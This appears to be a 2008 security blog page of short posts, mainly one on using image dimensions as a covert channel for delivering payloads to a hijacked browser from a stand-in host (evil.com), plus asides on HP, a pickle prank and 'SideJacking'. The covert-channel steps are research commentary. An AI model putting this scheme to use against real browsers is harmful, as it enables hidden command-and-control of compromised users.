I am a hacker and you are afraid and that makes you more dangerous than I ever could be.
Using Image Dimensions as a side channel
Topic: Technology
1:16 pm EST, Feb 14, 2008
Arshan over at Aspect posted something that sounds very familiar indeed over on his blog.
Disclaimer: I know this isn’t earth-shattering now when the sandbox isn’t there, but I think it’s cool that using image tags we can create a completely covert channel for bypassing the same origin policy and control browsers remotely. Just to be clear, this is not a traditional same-origin bypass where we’re on http://evil.com/ and we’re talking to http://mybank.com/. We’re talking about a hijacked client who’s in collusion with an evil server that wants to deliver the client some message, be it a code payload, instructions, etc. Can we restrict JavaScript from dynamically loading image tags? No more image pre-loading? I doubt it!
Here’s how it works.
* Client dynamically creates an Image() and points the source to http://evil.com/evil.cgi?password=somesecret * Server responds with an image that has a 16 pixels tall and 1 pixel wide (16 represents in this phase the total length of the payload) * Client then starts a loop that iterates 16/2 times: o Client dynamically creates a new Image() and points the source to http://evil.com/evil.cgi?password=somesecret&i= o The new image that has height x, width y o Client appends ASCII character value of x onto payload string o Client appends ASCII character value of y onto payload string * Client now has authenticated, 16-length payload to do whatever they want with
Hehe. I was wondering when someone would talk about this! John Terrill and I looked at this back late 2006, early 2007 and took this alittle further than Arshan did. Here is what we came up with:
The carry capacity of a side channel is an important factor. Arshan's solution is not very good because of the limited capacity. How can we use dimenstions as a side channel and not have to send tens of kilobytes to transer a few bytes of data in the side channel? Thats the "$1,000,000 and a Monster Truck" question which started John and I researching.
Lets take GIF images. According to the spec, length and width are 16 bit integers, giving us 4 bytes of data. However if I need to send 0xFFFFFFFF it would suck to have to transmit an image that is 65535x65535. That would be huge. But GIFs are compressed right? Remember that JavaScript cannot access pixel data of the Image objects it creates, so we really don't care about whats in this picture. What if we make it all white? That should compress well. While it does, you are still sending a... [ Read More (0.5k in body) ]
Put people in a crazy situation and people do crazy things
You have no right to a lawyer you have no right to witnesses You don't really know what the charges are And you certainly don't know what the secret evidence is against you
Its not about left or right, its about right and wrong
HP Aims To Improve Software Management -- Hewlett-Packard -- InformationWeek
Topic: Miscellaneous
4:53 pm EST, Feb 6, 2008
Nine out of the world's top 11 security hackers came to HP through the SPI Dynamics acquisition, he boasts, although it's not immediately clear who ranked those top 11.
Just in case the world missed the memo.
... ... [sigh] I can't even think of what to say about this. Expressing oneself through charts is a good idea.
After we wrote the book, Addison Wesley sent Bryan and I some pre-paid FedEx envelopes so we could send signed copies of the book to the reviewers and editors. Our pal Vinnie Liu was a reviewer but he had already come by our offices in Atlanta where he received his signed copy.
This presented Caleb and I with a very interesting situation: We had a prepaid and pre-addressed FedEx envelope for Vinnie and nothing legitimate that we needed to send him.
What to do, what to do?
So we cut out the tracking number, cut out the return address, and we sent him a giant pickle.
No message. No Explanation. Just Pickle.
Beware friends beware. The pickle wars have begun!
This whole "SideJacking" meme is especially annoying and amusing to me. I've had people contact me (neither Robert or Dave, mainly reporters and non-web infosec guys) asking my opionion on this dangerous attack. These are the same people have also said to me in the past that XSS isn't interesting because its just cookie theft and thats not very sexy.
